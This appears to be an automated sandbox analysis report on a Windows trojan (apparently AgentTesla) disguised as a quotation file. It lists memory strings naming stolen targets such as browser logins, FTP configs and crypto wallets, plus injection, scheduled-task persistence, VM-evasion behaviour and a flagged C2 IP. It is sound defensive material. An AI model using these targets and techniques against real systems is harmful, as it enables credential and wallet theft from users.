                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum0V
                        Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ok5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        1
                        Valid Accounts
                        221
                        Windows Management Instrumentation
                        1
                        Valid Accounts
                        1
                        Valid Accounts
                        1
                        Masquerading
                        1
                        OS Credential Dumping
                        331
                        Security Software Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium1
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        1
                        Access Token Manipulation
                        1
                        Valid Accounts
                        LSASS Memory11
                        Process Discovery
                        Remote Desktop Protocol3
                        Data from Local System
                        Exfiltration Over Bluetooth11
                        Non-Standard Port
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)311
                        Process Injection
                        1
                        Access Token Manipulation
                        Security Account Manager241
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)1
                        Scheduled Task/Job
                        1
                        Disable or Modify Tools
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
                        Virtualization/Sandbox Evasion
                        LSA Secrets1
                        Remote System Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common311
                        Process Injection
                        Cached Domain Credentials123
                        System Information Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                        Obfuscated Files or Information
                        DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 648537 Sample: QUOTATION062022.exe Startdate: 20/06/2022 Architecture: WINDOWS Score: 100 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 8 other signatures 2->64 7 QUOTATION062022.exe 2 2->7         started        11 Data.exe 1 2->11         started        process3 file4 48 C:\Users\user\...\QUOTATION062022.exe.log, ASCII 7->48 dropped 66 Writes to foreign memory regions 7->66 68 Allocates memory in foreign processes 7->68 70 Injects a PE file into a foreign processes 7->70 13 vbc.exe 15 30 7->13         started        17 cmd.exe 3 7->17         started        20 cmd.exe 1 7->20         started        72 Multi AV Scanner detection for dropped file 11->72 22 vbc.exe 27 11->22         started        24 cmd.exe 11->24         started        26 cmd.exe 11->26         started        signatures5 process6 dnsIp7 50 api.ip.sb 13->50 52 185.222.58.90, 17910, 49742, 49759 ROOTLAYERNETNL Netherlands 13->52 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->74 76 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 13->76 78 Tries to steal Crypto Currency Wallets 13->78 28 conhost.exe 13->28         started        44 C:\Users\user\AppData\Roaming\Data\Data.exe, PE32 17->44 dropped 46 C:\Users\user\...\Data.exe:Zone.Identifier, ASCII 17->46 dropped 30 conhost.exe 17->30         started        80 Uses schtasks.exe or at.exe to add and modify task schedules 20->80 32 conhost.exe 20->32         started        34 schtasks.exe 1 20->34         started        54 api.ip.sb 22->54 56 192.168.2.1 unknown unknown 22->56 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        40 schtasks.exe 24->40         started        42 conhost.exe 26->42         started        file8 signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        QUOTATION062022.exe47%VirustotalBrowse
                        QUOTATION062022.exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        QUOTATION062022.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Data\Data.exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        SourceDetectionScannerLabelLinkDownload
                        23.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1234943Download File
                        23.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1234943Download File
                        23.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1234943Download File
                        23.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        23.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        23.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1234943Download File
                        4.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1234943Download File
                        SourceDetectionScannerLabelLink
                        api.ip.sb3%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://ns.adobe.cobj_0%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentme0%Avira URL Cloudsafe
                        http://tempuri.org/t_0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://ns.adobe.c/g0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                        http://go.micros0%URL Reputationsafe
                        http://ns.adobe.c/g_0%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                        https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                        http://185.222.58.90:17910100%Avira URL Cloudmalware
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                        http://tempuri.org/00%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://ns.adobe.cobj0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                        http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                        https://helpx.ad0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                        https://get.adob0%URL Reputationsafe
                        http://185.222.58.90:1100%Avira URL Cloudmalware
                        http://185.222.58.90:17910/100%Avira URL Cloudmalware
                        http://ns.ado/1_0%Avira URL Cloudsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                        http://185.222.58.90:1791040%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                        http://ns.ado/10%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        http://185.222.58.90:17910/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr, tmpE68F.tmp.23.drfalse
                          high
                          http://service.rvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/ac/?q=vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                            high
                            http://ns.adobe.cobj_vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://support.google.com/chrome/?p=plugin_wmpvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://support.google.com/chrome/answer/6258784vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Endpoint/EnvironmentSettingsvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Endpoint/SetEnvironmentmevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://tempuri.org/t_vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/soap/envelope/vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.google.com/chrome/?p=plugin_flashvbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/envelope/Dvbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ns.adobe.c/gvbc.exe, 00000004.00000003.377169989.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377236233.000000000D2C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377186734.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.366510707.000000000D2B1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
